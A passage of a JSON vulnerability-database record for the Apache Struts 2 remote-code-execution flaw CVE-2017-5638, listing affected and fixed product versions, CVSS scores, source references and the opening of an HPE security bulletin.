{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.1.0"
},
{
"model": "storage v5030",
"scope": "eq",
"trust": 1.0,
"vendor": "lenovo",
"version": "7.7.1.6"
},
{
"model": "struts",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.5.0"
},
{
"model": "server automation",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": "10.0.0"
},
{
"model": "storwize v3500",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "7.7.1.6"
},
{
"model": "oncommand balance",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "struts",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.3.32"
},
{
"model": "storage v5030",
"scope": "eq",
"trust": 1.0,
"vendor": "lenovo",
"version": "7.8.1.0"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.3.6.0.0"
},
{
"model": "server automation",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": "10.2.0"
},
{
"model": "storwize v5000",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "7.8.1.0"
},
{
"model": "storwize v7000",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "7.8.1.0"
},
{
"model": "struts",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.5.10.1"
},
{
"model": "storwize v7000",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "7.7.1.6"
},
{
"model": "clearpass policy manager",
"scope": "lt",
"trust": 1.0,
"vendor": "arubanetworks",
"version": "6.6.5"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"model": "storwize v5000",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "7.7.1.6"
},
{
"model": "server automation",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": "10.5.0"
},
{
"model": "server automation",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": "10.1.0"
},
{
"model": "server automation",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": "9.1.0"
},
{
"model": "storwize v3500",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "7.8.1.0"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.3.30"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.8"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.7"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.5"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.10"
},
{
"model": "struts",
"scope": "lte",
"trust": 0.8,
"vendor": "apache",
"version": "2.3.5 from 2.3.31"
},
{
"model": "struts",
"scope": "lte",
"trust": 0.8,
"vendor": "apache",
"version": "2.5 from 2.5.10"
},
{
"model": "esmpro/servermanager",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "6.10 to 6.16"
},
{
"model": "infoframe relational store",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": "istorage",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "hs series 5.0.5"
},
{
"model": "staroffice x",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "enterprise v4.0"
},
{
"model": "staroffice x",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "enterprise v5.0"
},
{
"model": "staroffice x",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "enterprise v5.1"
},
{
"model": "staroffice x",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "standard v4.0"
},
{
"model": "staroffice x",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "standard v5.0"
},
{
"model": "staroffice x",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "standard v5.1"
},
{
"model": "webotx developer",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "\"(with developers studio) v9.3\""
},
{
"model": "webotx developer",
"scope": "eq",
"trust": 0.8,
"vendor": "nec",
"version": "\"(with developers studio) v9.4\""
},
{
"model": "hirdb",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "server version 9"
},
{
"model": "hirdb control manager",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "- server version 9"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.5.4"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.5.3"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.5.6"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.5.9"
},
{
"model": "vrealize operations manager",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.0"
},
{
"model": "vrealize hyperic",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.0"
},
{
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5"
},
{
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.0"
},
{
"model": "horizon desktop as-a-service platform",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "7.0"
},
{
"model": "horizon desktop as-a-service platform",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.18.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.2.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.1.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0.0"
},
{
"model": "sterling selling and fulfillment foundation",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.5"
},
{
"model": "sterling selling and fulfillment foundation",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.4"
},
{
"model": "sterling selling and fulfillment foundation",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.2.1"
},
{
"model": "sterling selling and fulfillment foundation",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.2"
},
{
"model": "sterling selling and fulfillment foundation",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "sterling selling and fulfillment foundation",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.3.0"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.5"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.5"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "smsgw v100r003c01",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "smsgw v100r002c11",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "smsgw v100r002c01",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "secospace antiddos8030 v100r001c00",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "imanager neteco v600r007c91",
"scope": "eq",
"trust": 0.3,
"vendor": "huawei",
"version": "6000"
},
{
"model": "imanager neteco v600r007c90",
"scope": "eq",
"trust": 0.3,
"vendor": "huawei",
"version": "6000"
},
{
"model": "imanager neteco v600r007c80",
"scope": "eq",
"trust": 0.3,
"vendor": "huawei",
"version": "6000"
},
{
"model": "imanager neteco v600r008c20",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "imanager neteco v600r008c10",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "imanager neteco v600r008c00",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "imanager neteco v600r007c60spc100",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "imanager neteco v600r007c50",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "imanager neteco v600r007c11",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "espace ecs v300r001c00",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "espace ecs v200r003c10",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "espace ecs v200r003c00",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "espace ecs v200r002c00",
"scope": null,
"trust": 0.3,
"vendor": "huawei",
"version": null
},
{
"model": "universal cmdb foundation software cup5",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "10.22"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "9.16"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "9.15"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "9.14"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "9.13"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "9.12"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "9.10"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "9.1"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "10.50"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "10.20"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "10.10"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "10.02"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "10.01"
},
{
"model": "server automation",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "10.00"
},
{
"model": "virtualized voice browser",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unity connection",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified sip proxy software",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified intelligent contact management enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified intelligence center",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified contact center express",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified contact center enterprise live data server",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "-0"
},
{
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified communications manager session management edition",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified communications manager im \u0026 presence service",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "socialminer",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "prime service catalog appliance and virtual appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "prime license manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "packaged contact center enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "mediasense",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "identity services engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "hosted collaboration solution for contact center",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "hosted collaboration mediation fulfillment",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "finesse",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "emergency responder",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "hipchat server",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.0"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.11"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.10.1"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.9.5"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.9.4"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.9.3"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.9.2"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.9.1"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.9"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.8.8"
},
{
"model": "crowd",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.8.3"
},
{
"model": "bamboo",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "5.15"
},
{
"model": "bamboo",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "5.12"
},
{
"model": "bamboo",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "5.11"
},
{
"model": "bamboo",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "5.10"
},
{
"model": "bamboo",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "5.1"
},
{
"model": "bamboo",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "5.12.3.1"
},
{
"model": "bamboo",
"scope": "eq",
"trust": 0.3,
"vendor": "atlassian",
"version": "5.11.4.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.31"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.28"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.24"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.5"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.5.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.5"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.8"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.7"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.29"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.20"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.16"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.15"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.14"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.12"
},
{
"model": "vcenter server 6.5b",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": null
},
{
"model": "sterling selling and fulfillment foundation 9.5.0-sfp2",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "sterling selling and fulfillment foundation 9.4.0-sfp3",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "sterling selling and fulfillment foundation 9.3.0-sfp5",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "sterling selling and fulfillment foundation sfp6",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.2.1-"
},
{
"model": "sterling selling and fulfillment foundation sfp6",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.2.0-"
},
{
"model": "sterling selling and fulfillment foundation sfp6",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.0-"
},
{
"model": "virtualized voice browser su1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5"
},
{
"model": "unity connection",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "12.0"
},
{
"model": "unity connection",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5"
},
{
"model": "unity connection",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.0"
},
{
"model": "unified sip proxy software",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "10.1"
},
{
"model": "unified intelligent contact management enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5(1)"
},
{
"model": "unified intelligent contact management enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.0(2)"
},
{
"model": "unified intelligent contact management enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "10.5(3)"
},
{
"model": "unified intelligent contact management enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "10.0(2)"
},
{
"model": "unified intelligence center es03",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5(1)"
},
{
"model": "unified contact center express su1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5"
},
{
"model": "unified contact center enterprise live data server",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "-11.5(1)"
},
{
"model": "unified contact center enterprise live data server",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "-11.0(2)"
},
{
"model": "unified contact center enterprise live data server",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "-10.5(3)"
},
{
"model": "unified contact center enterprise live data server",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "-10.0(2)"
},
{
"model": "unified contact center enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5(1)"
},
{
"model": "unified contact center enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.0(2)"
},
{
"model": "unified contact center enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "10.5(3)"
},
{
"model": "unified contact center enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "10.0(2)"
},
{
"model": "socialminer su1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5"
},
{
"model": "prime license manager 11.5 su1a",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "mediasense",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5"
},
{
"model": "hosted collaboration solution for contact center",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5(1)"
},
{
"model": "hosted collaboration solution for contact center",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.0(2)"
},
{
"model": "hosted collaboration solution for contact center",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "10.5(3)"
},
{
"model": "hosted collaboration solution for contact center",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "10.0(2)"
},
{
"model": "finesse es2",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "11.5"
},
{
"model": "hipchat server",
"scope": "ne",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.2.2"
},
{
"model": "crowd",
"scope": "ne",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.11.1"
},
{
"model": "crowd",
"scope": "ne",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.10.3"
},
{
"model": "crowd",
"scope": "ne",
"trust": 0.3,
"vendor": "atlassian",
"version": "2.9.7"
},
{
"model": "bamboo",
"scope": "ne",
"trust": 0.3,
"vendor": "atlassian",
"version": "5.15.3"
},
{
"model": "bamboo",
"scope": "ne",
"trust": 0.3,
"vendor": "atlassian",
"version": "5.14.5"
},
{
"model": "struts",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "2.5.10.1"
},
{
"model": "struts",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.32"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "BID",
"id": "96729"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001621"
},
{
"db": "NVD",
"id": "CVE-2017-5638"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:apache:struts",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:esmpro_servermanager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:infoframe_relational_store",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:istorage",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:staroffice_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:webotx_developer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:hirdb",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:hirdb_control_manager",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-001621"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nike Zheng",
"sources": [
{
"db": "BID",
"id": "96729"
}
],
"trust": 0.3
},
"cve": "CVE-2017-5638",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2017-5638",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 10.0,
"collateralDamagePotential": "NONE",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.7,
"exploitability": "HIGH",
"exploitabilityScore": 10.0,
"id": "CVE-2017-5638",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "HIGH",
"trust": 1.6,
"userInteractionRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-5638",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-5638",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-5638",
"trust": 1.6,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2017-5638",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2017-5638",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-5638",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201703-152",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2017-5638",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "VULMON",
"id": "CVE-2017-5638"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001621"
},
{
"db": "NVD",
"id": "CVE-2017-5638"
},
{
"db": "NVD",
"id": "CVE-2017-5638"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string. Apache Struts2 Contains a vulnerability that allows the execution of arbitrary code. Apache Struts2 In Jakarta Multipart parser A vulnerability exists in the execution of arbitrary code that could allow the execution of arbitrary code. The attack code for this vulnerability has been released.By processing a request crafted by a remote third party, arbitrary code could be executed with the privileges of the application. \nApache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03723en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03723en_us\nVersion: 1\n\nHPESBHF03723 rev.1 - HPE Aruba ClearPass Policy Manager, using Apache Struts,\nRemote Code Execution\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-03-29\nLast Updated: 2017-03-29\n\nPotential Security Impact: Remote: Code Execution\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified in HPE Aruba ClearPass\nPolicy Manager. \n\n**Note:** The ClearPass Policy Manager administrative Web interface is\naffected by the vulnerability. ClearPass Guest, Insight, and Graphite are NOT\nimpacted. \n\n - Aruba ClearPass Policy Manager All versions prior to 6.6.5\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2017-5638\n 9.4 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n 9.7 (AV:N/AC:L/Au:N/C:C/I:C/A:P)\n\n Information on CVSS 